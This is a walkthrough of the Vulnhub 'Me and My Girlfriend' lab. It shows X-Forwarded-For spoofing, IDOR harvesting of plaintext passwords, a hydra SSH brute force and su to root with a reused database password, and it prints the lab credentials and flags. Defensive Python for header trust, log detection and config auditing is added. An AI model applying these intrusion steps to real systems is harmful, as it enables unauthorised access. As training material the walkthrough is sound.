Vulnhub: Me and My Girlfriend, detailed walkthrough

Me and My Girlfriend

Author: jason huawen

Target information

Name: Me and My Girlfriend: 1

URL:

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:61:8a:f1      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:87:26:b3      1      60  PCS Systemtechnik GmbH            

Using Kali Linux's netdiscover, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
                                                                            

The NMAP scan shows that the target has two open ports: 22 (ssh) and 80 (http).

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254                       
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

The site can only be accessed locally, and the HTML comment hints at setting x-forwarded-for in the request header.

We can intercept the request with Burp Suite and add the header x-forwarded-for: 127.0.0.1.

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt         
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell     

With that header in place the page is served successfully:

Editing every request in Burp Suite is tedious, though; a browser extension that forges the X-Forwarded-For header can do it automatically instead.
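The gate the site implements trusts X-Forwarded-For unconditionally, which is why a single spoofed header defeats it. The following is an added Python model of that check, not the target's PHP code: client_ip_naive reproduces the flaw, and client_ip_trusted shows the usual fix, which honours the header only when the TCP peer is a reverse proxy you operate (TRUSTED_PROXIES is an assumed value) and reads the chain from the right, skipping proxy hops, because the leftmost entry is whatever the original client chose to send.

```python
import ipaddress

# Added example (Python), not the target's PHP code: it models the
# "local only" gate described in the write-up. TRUSTED_PROXIES is an
# assumption: the addresses of reverse proxies you actually run in front
# of the application.
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """The flawed behaviour seen on the target: whatever the client puts in
    X-Forwarded-For is believed and the TCP peer address is never consulted."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_trusted(remote_addr: str, headers: dict,
                      trusted_proxies=TRUSTED_PROXIES) -> str:
    """Hardened version: X-Forwarded-For is honoured only when the TCP peer is
    one of our own proxies, and the client address is the rightmost hop that is
    not itself a trusted proxy (each proxy appends the address it saw)."""
    xff = headers.get("X-Forwarded-For")
    if remote_addr not in trusted_proxies or not xff:
        return remote_addr
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return remote_addr


def is_loopback(ip: str) -> bool:
    """True only for a syntactically valid loopback address (127.0.0.0/8 or ::1)."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def local_only_gate(remote_addr: str, headers: dict, resolver=client_ip_trusted) -> bool:
    """Return True when the request is allowed to see the 'local only' site."""
    return is_loopback(resolver(remote_addr, headers))


if __name__ == "__main__":
    # Constructed request: a LAN client sending the spoofed header, as in the write-up.
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("naive gate, spoofed header  :", local_only_gate("192.168.56.1", spoofed, client_ip_naive))
    print("trusted gate, spoofed header:", local_only_gate("192.168.56.1", spoofed))
    print("trusted gate, real loopback :", local_only_gate("127.0.0.1", {}))
```

With the naive resolver the spoofed request passes; with the trusted resolver the same request is evaluated on its real peer address 192.168.56.1 and is refused, while a connection that genuinely arrives on the loopback interface still passes.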

Judging from the URL, could there be a local file inclusion vulnerability?

http://192.168.56.254/index.php?page=login

Testing it returned nothing, but produced no error either.

The PHP filter wrapper did not work either:

http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index

Intercept the request with Burp Suite, save it to a file, and scan it with sqlmap to check for SQL injection:

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5

sqlmap found no SQL injection vulnerability.

Next, register a user named test and see what turns up. After logging in as test,

note the URL:

http://192.168.56.254/index.php?page=dashboard&user_id=14

Let's see whether changing the user_id value allows horizontal privilege escalation (an insecure direct object reference).

Setting user_id=1 and viewing the profile:

Note that the page source now contains the user's password in plaintext, in the value attribute of the password field:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Ceban Corp</title>
    <style>
        .center {
            text-align: center;
        }
    </style>
</head>
<body>

    <div class="center">
        <h2>Welcome To Ceban Corp</h2>
        <p>Inspiring The People To Great Again!</p>
        <hr>
                <p><a href="?page=dashboard">Dashboard</a> | <a href="?page=profile&user_id=14">Profile</a> | <a href="?page=logout">Logout</a></p>
                <hr>
    </div>

    <form action="#" method="POST">
    <label for="name">Name</label>
    <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
    <label for="username">Username</label>
    <input type="text" name="username" id="username" value="eweuhtandingan"><br>
    <label for="password">Password</label>
    <input type="password" name="password" id="password" value="skuyatuh"><br>
    <button disabled="disabled">Change</button>
</form>

</body>
</html>

Does this username and password also work for SSH? It turns out it does not, so collect every user's username and password instead (enumerate user_id from 1 upward until the page returns no content):
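Both the single IDOR request above and the full user_id enumeration leave the same trace in the web server log: one client fetching page=profile for many different user_id values, each answered with 200. The following is an added Python detector, not part of the original write-up, that parses constructed Apache combined-log lines modelled on those requests and flags any client that successfully viewed at least threshold distinct profiles.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the original write-up. Constructed Apache
# combined-log lines: one client walks user_id=1..6 on the profile page,
# another only views its own profile (user_id=14) twice.
SAMPLE_LOG = """\
192.168.56.1 - - [08/Apr/2023:20:31:02 -0400] "GET /index.php?page=dashboard&user_id=14 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:10 -0400] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:14 -0400] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 1039 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:17 -0400] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 1040 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:21 -0400] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 1044 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:25 -0400] "GET /index.php?page=profile&user_id=5 HTTP/1.1" 200 1038 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:20:31:29 -0400] "GET /index.php?page=profile&user_id=6 HTTP/1.1" 200 1041 "-" "Mozilla/5.0"
192.168.56.77 - - [08/Apr/2023:20:40:00 -0400] "GET /index.php?page=profile&user_id=14 HTTP/1.1" 200 1041 "-" "Mozilla/5.0"
192.168.56.77 - - [08/Apr/2023:20:41:00 -0400] "GET /index.php?page=profile&user_id=14 HTTP/1.1" 200 1041 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [timestamp] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Return the fields we care about, or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m["target"]).query)
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "page": qs.get("page", [None])[0],
        "user_id": qs.get("user_id", [None])[0],
    }


def flag_idor_enumeration(log_text, threshold=5):
    """Map client IP -> sorted distinct user_id values it viewed with a 200 on
    page=profile, keeping only clients that reached the threshold."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["page"] != "profile" or rec["status"] != 200:
            continue
        if rec["user_id"] is not None and rec["user_id"].isdigit():
            seen[rec["ip"]].add(int(rec["user_id"]))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in flag_idor_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: viewed {len(ids)} distinct profiles, user_id {ids[0]}..{ids[-1]}")
```

The detector only flags successful (200) profile views, so once the application is fixed to compare user_id against the logged-in session and return 403 for anyone else's profile, the same enumeration attempt stops matching. The other half of the fix is never to echo the stored password into the form's value attribute at all; a password change form should take a new password and the current one, not display the existing one.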

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254                              
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password: 
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password: 

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict 
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict 
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
                
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254                 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254         
alice@192.168.56.254's password: 
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
-rw------- 1 alice alice   10 Dec 13  2019 .bash_history
-rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
-rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
alice@gfriEND:~$ cat .bash_history 
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
-rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt 
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x  6 root           root           4.0K Dec 13  2019 .
drwxr-xr-x 22 root           root           4.0K Dec 13  2019 ..
drwxr-xr-x  2 aingmaung      aingmaung      4.0K Dec 13  2019 aingmaung
drwxr-xr-x  4 alice          alice          4.0K Dec 13  2019 alice
drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4.0K Dec 13  2019 eweuhtandingan
drwxr-xr-x  2 sundatea       sundatea       4.0K Dec 13  2019 sundatea

That gives us the first flag.

Privilege escalation

alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13  2019 .
drwxr-xr-x 5 root root 4.0K Dec 13  2019 ..
-rw-rw-r-- 1 root root   88 Dec 13  2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php 
<?php

    $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ su - root
Password: 
root@gfriEND:~# cd /root
root@gfriEND:~# ls -alh
total 32K
drwx------  3 root root 4.0K Dec 13  2019 .
drwxr-xr-x 22 root root 4.0K Dec 13  2019 ..
-rw-------  1 root root    0 Dec 13  2019 .bash_history
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
drwx------  2 root root 4.0K Dec 13  2019 .cache
-rw-r--r--  1 root root 1000 Dec 13  2019 flag2.txt
-rw-------  1 root root  238 Dec 13  2019 .mysql_history
-rw-------  1 root root   81 Dec 13  2019 .nano_history
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~# 

That gives us a root shell and the root flag. Privilege escalation on this box is fairly simple: with a little care you find the configuration weakness, a world-readable config.php whose database root password also works for su to the OS root account.
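The two weaknesses that made the escalation trivial, a config file readable by every local account and a web application connecting with hardcoded database root credentials, are both checkable before an attacker gets there. The following is an added Python audit script, not part of the original write-up: it walks a web root, finds config-like files, and reports their permission mode and any hardcoded mysqli_connect credentials (reporting the account name, never the secret). The file names and the sample config it builds in demo() are constructed, with an obvious placeholder password.

```python
import os
import re
import stat
import tempfile

# Added example, not part of the original write-up. Audits a web root for
# configuration files that are readable or writable by every local account
# (config.php on the target was mode -rw-rw-r--) or that embed database
# credentials, and flags use of the database root account.
CONFIG_NAME_RE = re.compile(r"(^|[._-])config[^/]*\.php$|\.env$|settings\.php$", re.I)
MYSQL_CONNECT_RE = re.compile(
    r"mysqli?_connect\s*\(\s*'[^']*'\s*,\s*'(?P<user>[^']*)'\s*,\s*'(?P<password>[^']*)'",
    re.I)


def audit_config_file(path):
    """Return a list of finding strings for one configuration file."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    with open(path, encoding="utf-8", errors="replace") as fh:
        m = MYSQL_CONNECT_RE.search(fh.read())
    if m:
        # Report the account, never the secret itself, so the audit output cannot leak it.
        findings.append(f"hardcoded db credentials (user={m['user']})")
        if m["user"] == "root":
            findings.append("web app connects as database root")
        if m["password"] == "":
            findings.append("empty db password")
    return findings


def audit_webroot(root):
    """Return {path relative to root: [findings]} for every config-like file under root."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not CONFIG_NAME_RE.search(name):
                continue
            path = os.path.join(dirpath, name)
            findings = audit_config_file(path)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def demo():
    """Build a throwaway web root shaped like the target's and audit it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    cfg_dir = os.path.join(root, "config")
    os.makedirs(cfg_dir)
    cfg = os.path.join(cfg_dir, "config.php")
    with open(cfg, "w", encoding="utf-8") as fh:  # constructed sample with a placeholder password
        fh.write("<?php\n\n    $conn = mysqli_connect('localhost', 'root', "
                 "'EXAMPLE_DB_PASSWORD', 'ceban_corp');\n")
    os.chmod(cfg, 0o664)  # -rw-rw-r--, the mode seen on the target
    return audit_webroot(root)


if __name__ == "__main__":
    for rel_path, findings in demo().items():
        print(rel_path)
        for f in findings:
            print("  -", f)
```

Run against a real web root, the script would have flagged config/config.php on this box on three counts. The corresponding fixes are to chown the file to the web server user with mode 0640, to give the application a dedicated database account limited to its own schema, and never to share a password between a service account and an interactive OS account.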
